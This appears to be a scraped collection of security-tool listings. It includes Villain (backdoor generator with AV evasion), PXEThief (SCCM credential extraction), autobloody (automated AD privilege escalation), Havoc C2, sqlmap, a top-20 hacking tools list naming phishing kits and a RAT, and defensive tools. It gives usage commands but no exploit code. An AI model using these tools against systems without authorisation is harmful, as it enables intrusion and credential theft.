Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β»

Please note that the examples used in the screenshots are resolved in the lab only

This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances, feel free to open PR if you find any issue or you have a new thing to add.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details



Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions


Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

This is an early release currently being tested.
If you are having detection issues, watch this video on how to bypass signature-based detection

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

  1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
  2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
  3. The communication between sibling servers is AES encrypted using the recipient sibling server's ID as the encryption KEY and the 16 first bytes of the local server's ID as IV. During the initial connection handshake of two sibling servers, each server's ID is exchanged clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure as this tool was designed to be used during penetration testing / red team assessments, for which this encryption schema should be enough.
  4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

  • A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

  • When it comes to Windows, the generated payloads can run even in PowerShell constraint Language Mode.
  • The generated payloads can run even by users with limited privileges.

Contributions

Pull requests are generally welcome. Please, keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests because I either have a plan for the course of a project or I evaluate that it would be hard to test and/or maintain the foreign code. It doesn't have to do with how good or bad is an idea, it's just too much work and also, I am kind of developing all these tools to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.



SQLMAP - Automatic SQL Injection Tool 1.7

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

ModSecurity Backdoor Tool

Proof of concept remote command execution and file retrieval backdoor script for ModSecurity.

PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager


PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collectio n Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly over permissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.

Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.


Usage Instructions

python pxethief.py -h 
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text

pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.

Configuration Options

A file contained in the main PXEThief folder is used to set more static configuration options. These are as follows:

[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =

[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0

[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1

Scapy settings

  • automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1 it will attempt to use the interface that can reach the machine's default GW as output interface. If set to 2, it will look for the first interface that it finds that has an IP address that is not an autoconfigure or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific inteface with 'manual_interface_selection_by_id'.
  • manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.

General settings

  • sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
  • auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.

HTTP Connection Settings

Not implemented in this release

Setup Instructions

  1. Create a new Windows VM
  2. Install Python (From https://www.python.org/ or through the store, both should work fine)
  3. Install all the requirements through pip (pip install -r requirements.txt)
  4. Install Npcap (https://npcap.com/#download) (or Wireshark, which comes bundled with it) for Scapy
  5. Bridge the VM to the network running a ConfigMgr Distribution Point set up for PXE/OSD
  6. If using pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one, if it is not correct, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10

Limitations

  • Proxy support for HTTP requests - Currently only configurable in code. Proxy support can be enabled on line 35 of pxethief.py and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base
  • HTTPS and mutual TLS support - Not implemented at the moment. Can use an intercepting proxy to handle this though, which works well in my experience; to do this, you will need to configure a proxy as mentioned above
  • Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

Proof of Concept note

Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.

Related work

Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.

DEF CON 30 Slides - Link to the talk slides

Author Credit

Copyright (C) 2022 Christopher Panayi, MWR CyberSec



GNUnet P2P Framework 0.19.1

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework


Subparse, is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine all before indexing the information parsed into an elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 parsing engine, the default parsing modules (ELFParser, OLEParser and PEParser), and 4 enrichment modules (ABUSEEnricher, C APEEnricher, STRINGEnricher and YARAEnricher).

Β 

Getting Started

Software Requirements

To get started using Subparse there are a few requrired/recommened programs that need to be installed and setup before trying to work with our software.

Software Status Link
Docker Required Installation Guide
Python3.8.1 Required Installation Guide
Pyenv Recommended Installation Guide

Additional Requirements

After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.


Python Requirements
Python requires some other packages to be installed that Subparse is dependent on for its processes. To get the Python set up completed navigate to the location of your Subparse installation and go to the *parser* folder. The following commands that you will need to use to install the Python requirements is:
sudo get apt install build-essential
pip3 install -r ./requirements.txt

Docker Requirements
Since Subparse uses Docker for its backend and web interface, the set up of the Docker containers needs to be completed before being able to use the program. To do this navigate to the root directory of the Subparse installation location, and use the following command to set up the docker instances:
docker-compose up

Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.

Β 

Installation steps


Usage

Command Line Options

Command line options that are available for subparse/parser/subparse.py:

Argument Alternative Required Description
-h --help No Shows help menu
-d SAMPLES_DIR --directory SAMPLES_DIR Yes Directory of samples to parse
-e ENRICHER_MODULES --enrichers ENRICHER_MODULES No Enricher modules to use for additional parsing
-r --reset No Reset/delete all data in the configured Elasticsearch cluster
-v --verbose No Display verbose commandline output
-s --service-mode No Enters service mode allowing for mode samples to be added to the SAMPLES_DIR while processing

Viewing Results

To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.

Β 

General Information Collected

Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:

  • MD5 hash of the sample
  • SHA256 hash of the sample
  • Sample name
  • Sample size
  • Extension of sample
  • Derived extension of sample

Parser Modules

Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them due to the file type corresponding with those the PEParser is able to examine.

Default Modules


ELFParser
This is the default parsing module that will be executed against ELF files. Information that is collected:
  • General Information
  • Program Headers
  • Section Headers
  • Notes
  • Architecture Specific Data
  • Version Information
  • Arm Unwind Information
  • Relocation Data
  • Dynamic Tags

OLEParser
This is the default parsing module that will be executed against OLE and RTF formatted files, this uses the OLETools package to obtain data. The information that is collected:
  • Meta Data
  • MRaptor
  • RTF
  • Times
  • Indicators
  • VBA / VBA Macros
  • OLE Objects

PEParser
This is the default parsing module that will be executed against PE files that match or include the file types: PE32 and MS-Dos. Information that is collected:
  • Section code and count
  • Entry point
  • Image base
  • Signature
  • Imports
  • Exports

Β 

Enricher Modules

These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.

Default Modules


ABUSEEnricher
This enrichers uses the [Abuse.ch](https://abuse.ch/) API and [Malware Bazaar](https://bazaar.abuse.ch) to collect more information about the sample(s) subparse is analyzing, the information is then aggregated and stored in the Elastic database.
CAPEEnricher
This enrichers is used to communicate with a CAPEv2 Sandbox instance, to collect more information about the sample(s) through dynamic analysis, the information is then aggregated and stored in the Elastic database utilizing the Kafka Messaging Service for background processing.
STRINGEnricher
This enricher is a smart string enricher, that will parse the sample for potentially interesting strings. The categories of strings that this enricher looks for include: Audio, Images, Executable Files, Code Calls, Compressed Files, Work (Office Docs.), IP Addresses, IP Address + Port, Website URLs, Command Line Arguments.
YARAEnricher
This ericher uses a pre-compiled yara file located at: parser/src/enrichers/yara_rules. This pre-compiled file includes rules from VirusTotal and YaraRulesProject

Β 

Developing Custom Parsers & Enrichers

Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.

Note: Naming conventions with both class and file names must be strictly adheared to, this is the first thing that should be checked if you run into issues now getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.



Logging

The logger object is a singleton implementation of the default Python logger. For indepth usage please reference the Offical Doc. For Subparse the only logging methods that we recommend using are the logging levels for output. These are:

  • debug
  • warning
  • error
  • critical
  • exception
  • log
  • info


ACKNOWLEDGEMENTS

  • This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.


Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets


A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.

Why?

BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:

  1. My tools think in lists - until my tools parse exported JSON graphs, I need graph results in a line-by-line format .txt file
  2. Copy/pasting graph results - this plays into the first but do we need to explain this one?
  3. Graphs can be too large to draw - the information contained in any graph can aid our goals as the attacker and we need to be able to view all data efficiently
  4. Manually running custom cyphers is time-consuming - let's automate it :)

This tool can also help blue teams to reveal detailed information about their Active Directory environments as well.


Features

Take back control of your BloodHound data with cypherhound!

  • 264 cyphers as of date
    • Set cyphers to search based on user input (user, group, and computer-specific)
    • User-defined regex cyphers
  • User-defined exporting of all results
    • Default export will be just end object to be used as target list with tools
    • Raw export option available in grep/cut/awk-friendly format

Installation

Make sure to have python3 installed and run:

python3 -m pip install -r requirements.txt

Usage

Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>

Commands

The full command menu is shown below:

Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the number of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu

Important Notes

  • The program is configured to use the default Neo4j database and URI
  • Built for BloodHound 4.2.0, certain edges will not work for previous versions
  • Windows users must run pip3 install pyreadline3
  • Shortest paths exports are all the same (raw or not) due to their unpredictable number of nodes

Future Goals

  • Add cyphers for Azure edges

Issues and Support

Please be descriptive with any issues you decide to open and if possible provide output (if applicable).



Top 20 Most Popular Hacking Tools in 2022


As last year, this year we made a ranking with the most popular tools between January and December 2022.

Topics of the tools focus onΒ Phishing,Β Information Gathering, Automation Tools, among others.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2022:


  1. Zphisher - Automated Phishing Tool


  2. CiLocks - Android LockScreen Bypass


  3. Arkhota - A Web Brute Forcer For Android


  4. GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints


  5. AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING


  6. Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features


  7. Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN


  8. Android_Hid - Use Android As Rubber Ducky Against Another Android Device


  9. Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool


  10. HackingTool - ALL IN ONE Hacking Tool For Hackers


  11. Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux


  12. Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words


  13. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  14. BITB - Browser In The Browser (BITB) Templates


  15. Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks


  16. Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures


  17. Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


  18. Grafiki - Threat Hunting Tool About Sysmon And Graphs


  19. VLANPWN - VLAN Attacks Toolkit


  20. linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks





Happy New Year wishes the KitPloit team!


Scapy Packet Manipulation Tool 2.5.0

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.

Aftermath - A Free macOS IR Framework


Aftermath is a Swift-based, open-source incident response framework.

Aftermath can be leveraged by defenders in order to collect and subsequently analyze the data from the compromised host. Aftermath can be deployed from an MDM (ideally), but it can also run independently from the infected user's command line.

Aftermath first runs a series of modules for collection. The output of this will either be written to the location of your choice, via the -o or --output option, or by default, it is written to the /tmp directory.

Once collection is complete, the final zip/archive file can be pulled from the end user's disk. This file can then be analyzed using the --analyze argument pointed at the archive file. The results of this will be written to the /tmp directory. The administrator can then unzip that analysis directory and see a parsed view of the locally collected databases, a timeline of files with the file creation, last accessed, and last modified dates (if they're available), and a storyline which includes the file metadata, database changes, and browser information to potentially track down the infection vector.


Build

To build Aftermath locally, clone it from the repository

git clone https://github.com/jamf/aftermath.git

cd into the Aftermath directory

cd <path_to_aftermath_directory>

Build using Xcode

xcodebuild

cd into the Release folder

cd build/Release

Run aftermath

sudo ./aftermath

Usage

Aftermath needs to be root, as well as have full disk access (FDA) in order to run. FDA can be granted to the Terminal application in which it is running.

The default usage of Aftermath runs

sudo ./aftermath

To specify certain options

sudo ./aftermath [option1] [option2]

Examples

sudo ./aftermath -o /Users/user/Desktop --deep
sudo ./aftermath --analyze <path_to_collection_zip>

Releases

There is an Aftermath.pkg available under Releases. This pkg is signed and notarized. It will install the aftermath binary at /usr/local/bin/. This would be the ideal way to deploy via MDM. Since this is installed in bin, you can then run aftermath like

sudo aftermath [option1] [option2]

Uninstall

To uninstall the aftermath binary, run the AftermathUninstaller.pkg from the Releases. This will uninstall the binary and also run aftermath --cleanup to remove aftermath directories. If any aftermath directories reside elsewhere, from using the --output command, it is the responsibility of the user/admin to remove said directories.

Help Menu

Contributors
  • Stuart Ashenbrenner
  • Jaron Bradley
  • Maggie Zirnhelt
  • Matt Benyo
  • Ferdous Saljooki

Thank You

This project leverages the open source TrueTree project, written and licensed by Jaron Bradley.



Havoc - Modern and malleable post-exploitation command and control framework


Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.

Β 

Support

Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.

Quick Start

Please see the Wiki for complete documentation.

Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.

See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.


Features

Client

Cross-platform UI written in C++ and Qt

  • Modern, dark theme based on Dracula

Teamserver

Written in Golang

  • Multiplayer
  • Payload generation (exe/shellcode/dll)
  • HTTP/HTTPS listeners
  • Customizable C2 profiles
  • External C2

Demon

Havoc's flagship agent written in C and ASM

  • Sleep Obfuscation via Ekko or FOLIAGE
  • x64 return address spoofing
  • Indirect Syscalls for Nt* APIs
  • SMB support
  • Token vault
  • Variety of built-in post-exploitation commands

Extensibility


Community

You can join the official Havoc Discord to chat with the community!

Contributing

To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!



OFRAK - Unpack, Modify, And Repack Binaries


OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

OFRAK equips users with:

  • A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
  • A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary
  • Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
  • Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
  • Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation

See ofrak.com for more details.


GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.

Documentation

OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.

License

The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.

Contributing

Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.

Support

Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.


This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement β€œA” (Approved for Public Release, Distribution Unlimited).



Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound


autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.

Description

This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. The automation is composed of two steps:

  • Finding the optimal path for privesc using bloodhound data and neo4j queries.
  • Execute the path found using bloodyAD package

Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.


Installation

First if you run it on Linux, you must have libkrb5-dev installed on your OS in order for kerberos to work:

# Debian/Ubuntu/Kali
apt-get install libkrb5-dev

# Centos/RHEL
yum install krb5-devel

# Fedora
dnf install krb5-devel

# Arch Linux
pacman -S krb5

A python package is available:

pip install autobloody

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .

Dependencies

  • bloodyAD
  • Neo4j python driver
  • Neo4j with the GDS library
  • BloodHound
  • Python 3
  • Gssapi (linux) or Winkerberos (Windows)

How to use it

First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.

⚠️
-ds and -dt values are case sensitive

Simple usage:

autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'

Full help:

[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST

AD Privesc Automation

options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

How it works

First a privesc path is found using the Dijkstra's algorithm implemented into the Neo4j's GDS library. The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by BloodHound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of edge and the type of node reached (e.g user,group,domain).

Once a path is generated, autobloody will connect to the DC and execute the path and clean what is reversible (everything except ForcePasswordChange and setOwner).

Limitations

For now, only the following BloodHound edges are currently supported for automatic exploitation:

  • MemberOf
  • ForceChangePassword
  • AddMembers
  • AddSelf
  • DCSync
  • GetChanges/GetChangesAll
  • GenericAll
  • WriteDacl
  • GenericWrite
  • WriteOwner
  • Owns
  • Contains
  • AllExtendedRights


GRAudit Grep Auditing Tool 3.5

Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility, grep. It's comparable to other static analysis applications like RATS, SWAAT, and flaw-finder while keeping the technical requirements to a minimum and being very flexible.

S3Crets_Scanner - Hunting For Secrets Uploaded To Public S3 Buckets


  • S3cret Scanner tool designed to provide a complementary layer for the Amazon S3 Security Best Practices by proactively hunting secrets in public S3 buckets.
  • Can be executed as scheduled task or On-Demand

Automation workflow

The automation will perform the following actions:

  1. List the public buckets in the account (Set with ACL of Public or objects can be public)
  2. List the textual or sensitive files (i.e. .p12, .pgp and more)
  3. Download, scan (using truffleHog3) and delete the files from disk, once done evaluating, one by one.
  4. The logs will be created in logger.log file.

Prerequisites

  1. Python 3.6 or above
  2. TruffleHog3 installed in $PATH
  3. An AWS role with the following permissions:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:GetLifecycleConfiguration",
"s3:GetBucketTagging",
"s3:ListBucket",
"s3:GetAccelerateConfiguration",
"s3:GetBucketPolicy",
"s3:GetBucketPublicAccessBlock",
"s3:GetBucketPolicyStatus",
"s3:GetBucketAcl",
"s3:GetBucketLocation"
],
"Resource": "arn:aws:s3:::*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}
  1. If you're using a CSV file - make sure to place the file accounts.csv in the csv directory, in the following format:
Account name,Account id
prod,123456789
ci,321654987
dev,148739578

Getting started

Use pip to install the needed requirements.

# Clone the repo
git clone <repo>

# Install requirements
pip3 install -r requirements.txt

# Install trufflehog3
pip3 install trufflehog3

Usage

Argument Values Description Required
-p, --aws_profile The aws profile name for the access keys βœ“
-r, --scanner_role The aws scanner's role name βœ“
-m, --method internal the scan type βœ“
-l, --last_modified 1-365 Number of days to scan since the file was last modified; Default - 1 βœ—

Usage Examples

python3 main.py -p secTeam -r secteam-inspect-s3-buckets -l 1

Demo


Contributing

Pull requests and forks are welcome. For major changes, please open an issue first to discuss what you would like to change.



